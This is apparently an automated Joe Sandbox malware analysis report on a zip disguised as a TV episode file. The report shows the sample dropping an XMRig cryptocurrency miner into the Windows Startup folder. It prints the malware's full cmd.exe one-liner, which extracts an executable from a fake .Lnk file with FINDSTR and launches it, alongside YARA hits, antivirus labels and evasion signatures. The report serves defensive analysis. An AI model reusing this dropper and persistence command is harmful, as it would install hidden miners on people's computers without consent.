Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.zip

Overview

General Information

Sample name:From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.zip
Analysis ID:1541165
MD5:1f0fff5348e8f86f438769cbd12d9c56
SHA1:1fbd2ae60bb3bd9b837202619fadde65025ffade
SHA256:bdf77d739ca9afd5d9d00501ccb3eaa1a5fa9be9cf932d2452e3fbcc15c170e8
Infos:

Detection

Xmrig
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Yara detected Xmrig cryptocurrency miner
Machine Learning detection for dropped file
Monitors registry run keys for changes
Query firmware table information (likely to detect VMs)
Contains capabilities to detect virtual machines
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Findstr Launching .lnk File
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64_ra
  • rundll32.exe (PID: 7112 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • 7zG.exe (PID: 1992 cmdline: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv\" -spe -an -ai#7zMap16466:146:7zEvent23211 MD5: 50F289DF0C19484E970849AAC4E6F977)
  • cmd.exe (PID: 7120 cmdline: "C:\Windows\System32\cmd.EXE" /v:On/cSet l=From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv&Set J="C:\Users\user\AppData\Roaming\microsoft\windows\Start Menu\programs\Startup\user.exe"&(if not exist !J! FINDSTR/v "cmd.EXE hIT%time:~7,1%%time:~-2%" !l!.Lnk>!J!&START "" !J!)&cd C:\Users\user\AppData\Local\Temp&ECHO.>!l!&START !l! MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • findstr.exe (PID: 3544 cmdline: FINDSTR /v "cmd.EXE hIT702" From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • user.exe (PID: 7160 cmdline: "C:\Users\user\AppData\Roaming\microsoft\windows\Start Menu\programs\Startup\user.exe" MD5: 164093994D90CC1A8B15D96351665A54)
      • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Video.UI.exe (PID: 2624 cmdline: "C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe" -ServerName:Microsoft.ZuneVideo.AppX758ya5sqdjd98rx6z7g95nw6jy7bqx9y.mca MD5: FE340ECB1D09B5BAA66DFE25AF11654F)
  • Taskmgr.exe (PID: 4608 cmdline: "C:\Windows\system32\taskmgr.exe" /4 MD5: 58D5BC7895F7F32EE308E34F06F25DD5)
  • Taskmgr.exe (PID: 4932 cmdline: "C:\Windows\system32\taskmgr.exe" /4 MD5: 58D5BC7895F7F32EE308E34F06F25DD5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeLinux_Trojan_Pornoasset_927f314funknownunknown
    • 0x156058:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x64f151:$a1: mining.set_target
    • 0x64101e:$a2: XMRIG_HOSTNAME
    • 0x643b48:$a3: Usage: xmrig [OPTIONS]
    • 0x640ff4:$a4: XMRIG_VERSION
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeLinux_Trojan_Pornoasset_927f314funknownunknown
      • 0x156058:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
      Click to see the 1 entries
      SourceRuleDescriptionAuthorStrings
      00000010.00000000.1895701881.00007FF74DEB1000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000010.00000000.1895701881.00007FF74DEB1000.00000002.00000001.01000000.00000006.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0xf951:$a1: mining.set_target
        • 0x181e:$a2: XMRIG_HOSTNAME
        • 0x4348:$a3: Usage: xmrig [OPTIONS]
        • 0x17f4:$a4: XMRIG_VERSION
        00000010.00000000.1893533537.00007FF74D871000.00000020.00000001.01000000.00000006.sdmpLinux_Trojan_Pornoasset_927f314funknownunknown
        • 0x155c58:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48

        System Summary

        barindex
        Source: Process startedAuthor: Trent Liffick: Data: Command: FINDSTR /v "cmd.EXE hIT702" From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk, CommandLine: FINDSTR /v "cmd.EXE hIT702" From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk, CommandLine|base64offset|contains: CI4, Image: C:\Windows\System32\findstr.exe, NewProcessName: C:\Windows\System32\findstr.exe, OriginalFileName: C:\Windows\System32\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.EXE" /v:On/cSet l=From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv&Set J="C:\Users\user\AppData\Roaming\microsoft\windows\Start Menu\programs\Startup\user.exe"&(if not exist !J! FINDSTR/v "cmd.EXE hIT%time:~7,1%%time:~-2%" !l!.Lnk>!J!&START "" !J!)&cd C:\Users\user\AppData\Local\Temp&ECHO.>!l!&START !l!, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7120, ParentProcessName: cmd.exe, ProcessCommandLine: FINDSTR /v "cmd.EXE hIT702" From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk, ProcessId: 3544, ProcessName: findstr.exe
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeAvira: detection malicious, Label: PUA/GM.Miner.ES
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeAvira: detection malicious, Label: PUA/GM.Miner.ES
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeJoe Sandbox ML: detected

        Bitcoin Miner

        barindex
        Source: Yara matchFile source: 00000010.00000000.1895701881.00007FF74DEB1000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, type: DROPPED
        Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.16:49712 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.16:49710 version: TLS 1.2
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
        Source: C:\Windows\System32\Taskmgr.exeFile opened: C:\Users\user\AppData
        Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.16:49712 version: TLS 1.0
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: settings-ssl.xboxlive.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownHTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.16:49710 version: TLS 1.2

        System Summary

        barindex
        Source: 00000010.00000000.1895701881.00007FF74DEB1000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 00000010.00000000.1893533537.00007FF74D871000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 00000010.00000000.1895701881.00007FF74DEB1000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 00000010.00000000.1893533537.00007FF74D871000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: classification engineClassification label: mal76.evad.mine.winZIP@10/18@1/4
        Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv
        Source: C:\Windows\System32\Taskmgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\TM.750ce7b0-e5fd-454f-9fad-2f66513dfa1b
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
        Source: C:\Windows\System32\Taskmgr.exeFile read: C:\Users\desktop.ini
        Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv\" -spe -an -ai#7zMap16466:146:7zEvent23211
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.EXE" /v:On/cSet l=From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv&Set J="C:\Users\user\AppData\Roaming\microsoft\windows\Start Menu\programs\Startup\user.exe"&(if not exist !J! FINDSTR/v "cmd.EXE hIT%time:~7,1%%time:~-2%" !l!.Lnk>!J!&START "" !J!)&cd C:\Users\user\AppData\Local\Temp&ECHO.>!l!&START !l!
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe FINDSTR /v "cmd.EXE hIT702" From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.Lnk
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exe "C:\Users\user\AppData\Roaming\microsoft\windows\Start Menu\programs\Startup\user.exe"
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe "C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe" -ServerName:Microsoft.ZuneVideo.AppX758ya5sqdjd98rx6z7g95nw6jy7bqx9y.mca
        Source: unknownProcess created: C:\Windows\System32\Taskmgr.exe "C:\Windows\system32\taskmgr.exe" /4
        Source: unknownProcess created: C:\Windows\System32\Taskmgr.exe "C:\Windows\system32\taskmgr.exe" /4
        Source: C:\Program Files\7-Zip\7zG.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files\7-Zip\7zG.exeSection loaded: uxtheme.dll
        Source: C:\Program Files\7-Zip\7zG.exeSection loaded: cryptbase.dll
        Source: C:\Program Files\7-Zip\7zG.exeSection loaded: explorerframe.dll
        Source: C:\Program Files\7-Zip\7zG.exeSection loaded: textshaping.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: opencl.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: powrprof.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: umpdc.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: napinsp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: pnrpnsp.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: wshbth.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: nlaapi.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: winrnr.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.exeSection loaded: explorerframe.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: d3d11.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: d2d1.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dwrite.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dxgi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: sharedui.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: vccorlib140_app.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: msvcp140_app.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: concrt140_app.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: vcruntime140_app.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: vcruntime140_app.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: vcruntime140_app.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.xaml.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: coremessaging.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: bcp47langs.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: iertutil.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dcomp.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: twinapi.appcore.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wintypes.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.staterepositorycore.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windowmanagementapi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: textinputframework.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: inputhost.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: propsys.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: coreuicomponents.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: coreuicomponents.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: ntmarta.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: uxtheme.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: urlmon.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: srvcli.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: netutils.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: d3d10warp.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: dxcore.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: rometadata.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: textshaping.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.applicationmodel.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: esent.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.storage.applicationdata.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.storage.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: wldp.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: logoncli.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: threadpoolwinrt.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.globalization.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: bcp47mrm.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: profapi.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: clipc.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: cryptsp.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: mrmcorer.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.staterepositoryclient.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: appxdeploymentclient.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: cryptbase.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.ui.xaml.controls.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: windows.shell.servicehostbuilder.dll
        Source: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exeSection loaded: execmodelproxy.dll
